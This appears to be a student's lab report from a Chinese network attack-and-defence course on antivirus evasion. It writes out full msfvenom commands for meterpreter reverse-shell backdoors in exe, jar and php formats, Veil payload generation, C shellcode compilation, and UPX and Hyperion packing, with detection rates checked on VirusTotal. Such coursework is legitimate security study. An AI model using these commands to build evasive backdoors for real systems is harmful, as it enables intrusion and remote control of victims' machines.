20232424 2025-2026-1 《网络与系统攻防技术》实验三实验报告
20232424 2025-2026-1 《网络与系统攻防技术》实验三实验报告
1.实验内容
- 1.1尝试使用msfvenom中的编码器生成多种类型的后门文件
- 1.2利用工具对文件进行加壳操作
- 1.3使用C语言 + shellcode编程
- 1.4尝试利用免杀技术通过杀毒软件的检测并进行回连
2.问题回答
- (1)杀软是如何检测出恶意代码的?
- 特征码检测:提取恶意代码的唯一特征(如特定字符串、指令序列),与杀软数据库中的特征库比对,匹配即判定为恶意。
- 行为检测:监控程序运行时的异常行为(如修改系统注册表、反弹连接、静默植入、窃取敏感信息等),若触发行为规则就立即告警。
- (2)免杀是做什么?
- 免杀是通过技术手段,修改恶意代码的特征、行为或结构,躲避杀软的检测,让恶意代码能在目标系统中正常运行。
- (3)免杀的基本方法有哪些?
- 修改特征:对恶意代码进行加壳(如UPX与hyperion)、混淆、加密,破坏原有特征码。
- 行为伪装:修改恶意行为的执行逻辑(如延迟反弹连接、分段执行恶意操作、模拟正常程序行为),规避杀软的行为检测规则。
3.实验过程
3.0评判基准
本次实验以VIRUSTOTAL网站对后门文件的检测作为免杀效果的评判基准,对实验二的后门软件进行检测,如下图:
结果为50/71
3.1Msfvenom使用编码器
1.首先查看Msfvenom可使用的编码器,如图:
- 这里先使用shikata_ga_nai对后门程序进行一次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.19.129 LPORT=8000 -f exe > 20232424alive.exe
一次编码效果如图,比不使用编码稍强,但无法实现免杀
- 对后门程序进行十次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.19.129 LPORT=8000 -f exe > 20232424alive_1.exe
#-i [n] 表示进行n次编码
效果如图,只比一次编码多绕过一个检测,效果不理想
2.生成jar文件
- 将后门文件以jar包格式生成
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.129 LPORT=8000 x > 20232424jar.jar
效果如图,与上一步中一次编码的程序效果一致
- 对jar包进行十次编码
msfvenom -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.19.129 LPORT=8000 x > 20232424jar2.jar
效果如图,与一次编码的jar包无差别,免杀效果仍不理想
3.生成php文件
- 将后门文件以php格式生成
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.19.129 LPORT=8000 x > 20232424php.php
效果如图,与之前的文件相比,免杀效果有提高
- 对php文件做十次编码
msfvenom -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.19.129 LPORT=8000 x > 20232424php.php
此次效果大大提高,但仍有8个工具可检测出该php文件有威胁
3.2使用veil工具尝试免杀
1.环境配置
下载并安装veil工具
sudo apt -y install veil #下载veil工具
usr/share/veil/config/setup.sh --force --silent #静默运行Veil工具的初始化设置脚本,自动配置Veil运行所需的所有依赖环境和组件
完成
2.使用veil生成后门文件
veil
use 1 #进入Evasion(可生成绕过检测的后门文件)
list查看可用载荷
选择7)c/meterpreter/rev_tcp.py
set LHOST 192.168.19.129
set LPORT 2409
generate #生成载荷
payload_120232424 #生成文件的文件名
/var/lib/veil/output/compiled目录下可找到payload_20232424
检测该文件免杀情况
如图,仍可被36个工具检测出,veil工具也无法完全实现免杀
3.3C语言调用Shellcode
1.使用msfvenom生成一个C语言格式的shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.129 LPORT=8000 -f c
使用vi编辑器为后门文件加一个函数,如图:
将.c文件编译为可执行文件
传入物理机进行检测
2.加压缩壳upx
upx shellcode_c_20232424.exe -o shellcode_c_upx_20232424.exe
检测效果如图:
3.加密壳hyperion
这一步需要在/usr/share/windows-resources/hyperion/目录下进行
将上一步中的exe文件复制到该目录下,通过wine hyperion.exe -v shellcode_c_20232424.exe shellcode_c_hyp_20232424.exe对文件加密
检测效果如图:
效果较之前更差
3.4综合应用
1.生成一个十次编码的后门文件,参考上述步骤对其编译、加壳(压缩壳与加密壳均使用)
得到一个综合了所有技术的后门文件20232424_shellcode_multi_3.exe
对文件检测:
如图,效果依旧很差
3.5尝试回连
1.以上步骤均在关闭“windows安全中心-实时保护”的情况下进行,现在打开尝试免杀
如图,文件被“秒杀”,后门程序被删除
使用python试试能不能绕过检测
在虚拟机中生成一个.py后门文件传入物理机进行编译
编译完成后可执行文件就被查出并删除,只留下.py文件与SPEC文件
2.使用“火绒”进行杀软检测
开启后火绒代替windows安全中心进行实时保护
综合了多项工具的multi_3文件依旧被秒杀,但发现未添加加密壳的multi_2.exe可成功传入
成功绕过检测
但无法运行multi_2.exe,尝试回连失败
本次使用的杀毒软件为“火绒安全卫士”,版本:6.0.7.14,病毒库:2025-10-26 18:08
4.问题及解决方案
本次实验参考同学们的博客进行,并未遇到较大问题
浙公网安备 33010602011771号